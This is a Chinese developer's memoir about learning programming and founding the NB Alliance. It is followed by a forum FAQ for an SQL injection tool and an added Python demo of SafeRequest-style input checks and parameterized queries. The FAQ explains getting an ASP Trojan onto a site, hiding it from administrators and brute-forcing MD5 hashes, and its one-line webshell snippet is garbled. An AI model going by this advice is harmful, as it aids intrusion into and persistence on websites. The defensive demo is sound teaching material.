My first contact with a computer was on the thirteenth of March 1993, when Dad spent more than 4,000 yuan to buy a 386SX 25 and then forced me to learn the Wubi (five-stroke) input method (I could only practise on articles, not like today's kids who practise by chatting up girls on QQ). At that time I felt the computer was a very boring thing; I never expected to make a living from it today.
After more than half a year I had only learned some basic DOS knowledge. DOS could only use the 640K of base memory, so I often spent a lot of time writing config.sys for the sake of a few K of memory. After a year of repeatedly installing and configuring the system like this, I finally became a DOS master.
There wasn't much to do in DOS, so I started looking at programming. BASIC had too few functions, and I didn't understand C or assembly very well; only FoxBASE didn't seem too hard to play with. Perhaps I was destined for databases. After learning for more than two years, I could write some small database management systems.
Before learning the computer I had already played the stock market. Later I bought a stock receiver for home, so I could see real-time quotes at home. Soon I found the receiver's data files. One look and I saw they were originally in DBF format with only the extension changed, so I immediately started on the storage format of the stock analysis system. There was no network then, and few people around me knew anything; everything had to depend on myself, and so I developed the habit of using my brain. Through constant conversion and study I worked out the storage format of the stock analysis system; in two or three days a conversion program was released, and it could save 60-80 yuan a month. After running it for a while things went well, and later this system also sold two or three sets. Although it was only a few hundred yuan, it was enough for me. I got online in '98 and paid two months of long-distance phone bills before finally learning what "flooding" on a BBS was. There were few people on the Internet then, but the people online were very pure. At that time I met many masters, including today's Tencent boss Ma Huateng, known as Pony Ma. I really admire him: five years ago he took 700,000 made on the stock market to found Tencent, which no one had thought of. At that stage his courage is really something for us to look up to.
After the college entrance examination I got into Guangxian smoothly and started learning to make web pages. I learned a little Photoshop and FrontPage, but felt I wasn't suited to that sort of thing and that programming suited me better, so I was going to learn CGI. Just as I started, a classmate told me Microsoft had something called ASP that seemed a lot better than CGI, so I switched to ASP. Because I had already been writing programs for two or three years and it was more convenient to find information, within a month I could write a counter, and then a guestbook and the like. Of course, the code from that time looks very naive now.
In four years there wasn't much I truly learned, but the knowledge of databases and management information systems has played a big role on my current path. I had read the books beforehand, so I could apply them in practice, unlike most classmates, who gave everything back to the teacher. So whenever a website or project needed doing, the teacher would come to me for help. Helping the teacher has two benefits: the teacher's systems are designed according to a standardised process, so you can learn a lot, and on the other hand you needn't fear the exams. Heh, this is an open secret in many schools.
Because of this, finding a job at graduation was very smooth. After entering my first company I felt everything was very different from what I had imagined: no matter how capable you are, the company doesn't need you to do things best, but most efficiently. After a year at the first company there was less and less to learn, so I changed working environment and entered a company doing ERP development. The pay was OK and the company had quite a few masters. However, ERP development is indeed a very demanding job: the whole system has more than 600 tables, 9,700 fields and 25 modules, and in more than a year I got through less than half of it.
Work at this company wasn't very busy, so I could often chat with people online and exchange technology. Last year, while wandering online, I got to know Starlove and Fcuandy because of a post; I hadn't expected it, but I found they were all very good and, like me, very persistent people. Later I met 5945, Jadesun, Pure Life, Cool, National Brothers and others; everyone got on very well and we organised a flooding group, which is the present NB Alliance. In its early days NB was in a loose state, chatting and flooding about technology, until later the Dongwang administrators rubbed us the wrong way: why should we help others run advertisements? We could use our own technical advantages to commercialise the alliance. After a period of exploration, NB's products were launched one by one, and the alliance's popularity kept growing. I believe that one day the Dongwang people will find they have created a strong competitor.
I have spent such a long passage introducing NB, perhaps because I think NB is my hope, now and in the future, and the thing I am proud of.
The flooding account ends here. The road is still very long, and no one can predict the future, but everyone hopes tomorrow will be more brilliant, and I am no exception.
This board's FAQ and must-read; new friends please read:
1. NBSI is not universal; don't expect NBSI to guess 100% of sites, when even manual guessing can't do that. If NBSI can't guess a site, that doesn't mean it cannot be injected; it only means your injection skill isn't there yet.
2. Don't treat this as a place to look for websites to hack. If you have questions while trying, by all means raise them, but pay attention to the details: injection is a technique that requires judging many environmental factors.
3. Don't try to post a URL and have others teach you from head to tail, and don't try to get a few sentences to answer your whole problem; posts like "How do I get into this website" or "How do I get a webshell" I will delete directly.
4. Don't send me private messages asking me to help you; that's impossible, so don't waste each other's time.
5. Don't post things like "UP" or "Top"; if you think an article is well written, say what you got out of it, not just a bump.
6. It's best to look at the following frequently asked questions before posting, so as not to get bricks thrown at you:
(1) Q: What is SQL injection? A: http://nb.unionbyte.com/view.asp?postid=1457033
(2) Q: Can this situation be injected: Microsoft VBScript runtime error '800A000D' type mismatch: 'clng' (or type mismatch: 'cint')?
A: The parameter has been filtered. Although it isn't very friendly, it cannot be injected.
(3) Q: After getting the website's background management privileges, is there any way to put a Trojan on the site? A: Find somewhere to upload, and you can get an ASP Trojan up. With SQL Server you must get an absolute path, and then you can generate it with tools such as NBWS.
(4) Q: How do I crack this MD5 (such as AB2A34FDF3FD232)? A: At present MD5 can only be brute-forced; please don't ask others to crack it for you. Download the tool and crack it yourself. Tool here: http://nb.unionby.com/view.asp?postid=1457924
(5) Q: How to prevent SQL injection? A: Handle numeric, character and search parameters separately. For details see Xiaozhu's SafeRequest function:
Function SafeRequest(ParaName, ParaType)
    '--- Incoming parameters ---
    'ParaName: parameter name - string
    'ParaType: parameter type - numeric (1 means the parameter above is numeric, 0 means it is a string)
    Dim ParaValue
    ParaValue = Request(ParaName)
    If ParaType = 1 Then
        If Not IsNumeric(ParaValue) Then
            Response.Write "Parameter " & ParaName & " must be numeric!"
            Response.End
        End If
    Else
        'Double each single quote so the value can sit inside a quoted SQL literal
        ParaValue = Replace(ParaValue, "'", "''")
    End If
    SafeRequest = ParaValue
End Function
(6) Q: How can a Trojan be hidden after it is uploaded? A: From the administrator's point of view, write it into files he doesn't use; uncommon files are often safe. Or write a one-sentence Trojan: <% if Request ("x")> "" "" "" x ")%>
(7) Q: I got the Unicode code of a character, but I don't know how to restore it to a character. A: SQL Server's NCHAR() or VB's ChrW() can restore it.
(8) Q: I downloaded the database but can't find the admin backend. A: There is no shortcut to finding the backend; keep looking, or try another way.
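The following is an added example, not code from the page or from the NB Alliance: a Python port of the SafeRequest idea from FAQ (5), exercised against a small sqlite3 database that stands in for SQL Server (an assumption, chosen so the example runs offline). The table, its rows and the request values are constructed for this demo. It shows why the numeric check in FAQ (2) stops injection even though the page is still concatenating SQL, and puts the parameterized form next to it.

```python
import sqlite3

# Added example (not the page's code): Python port of the SafeRequest idea.
# sqlite3 stands in for SQL Server; table, rows and inputs are constructed.


class ParameterError(ValueError):
    """Raised where the ASP original would Response.Write an error and Response.End."""


def safe_request(params, name, numeric):
    """Mirror of SafeRequest(ParaName, ParaType).

    numeric=True  : the value must convert to an integer or the request is rejected.
                    This is the same effect as the CLng/CInt 'type mismatch' error
                    from FAQ (2), only with a friendlier message.
    numeric=False : single quotes are doubled so the value can sit inside a quoted
                    SQL string literal.
    """
    value = params.get(name, "")
    if numeric:
        try:
            return int(value)
        except ValueError:
            raise ParameterError(f"Parameter {name} must be numeric!") from None
    return value.replace("'", "''")


def build_db():
    """Constructed sample data: two public news items and one hidden draft."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, hidden INTEGER)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(1, "public post", 0), (2, "it's public too", 0), (3, "hidden draft", 1)],
    )
    return conn


def news_unfiltered(conn, params):
    """The vulnerable pattern: the raw request value is glued into the SQL text."""
    sql = "SELECT id, title FROM news WHERE hidden = 0 AND id = " + params.get("id", "")
    return conn.execute(sql).fetchall()


def news_safe_request(conn, params):
    """Same concatenation, but the id has passed the numeric check first."""
    news_id = safe_request(params, "id", numeric=True)
    sql = "SELECT id, title FROM news WHERE hidden = 0 AND id = " + str(news_id)
    return conn.execute(sql).fetchall()


def news_parameterized(conn, params):
    """Preferred form: validate the type, then let the driver bind the value."""
    news_id = safe_request(params, "id", numeric=True)
    sql = "SELECT id, title FROM news WHERE hidden = 0 AND id = ?"
    return conn.execute(sql, (news_id,)).fetchall()


def news_by_title(conn, params):
    """Character parameter: quotes doubled, then embedded inside a quoted literal."""
    title = safe_request(params, "title", numeric=False)
    sql = f"SELECT id FROM news WHERE hidden = 0 AND title = '{title}'"
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(news_unfiltered(db, {"id": "1"}))
    print(news_unfiltered(db, {"id": "1 OR 1=1"}))  # the hidden draft leaks
    try:
        news_safe_request(db, {"id": "1 OR 1=1"})
    except ParameterError as err:
        print("rejected:", err)
    print(news_parameterized(db, {"id": "2"}))
    print(news_by_title(db, {"title": "it's public too"}))
```

Two caveats the FAQ answer leaves implicit. Quote doubling only protects a value that the query embeds between quotes; it does nothing for a bare numeric value, which is exactly why the function branches on ParaType. And VBScript's IsNumeric accepts forms such as "1e5" or "&H1F", so the int() check in this port is stricter than the original; for the "search" case the page mentions, a value going into LIKE also needs its % and _ wildcards handled.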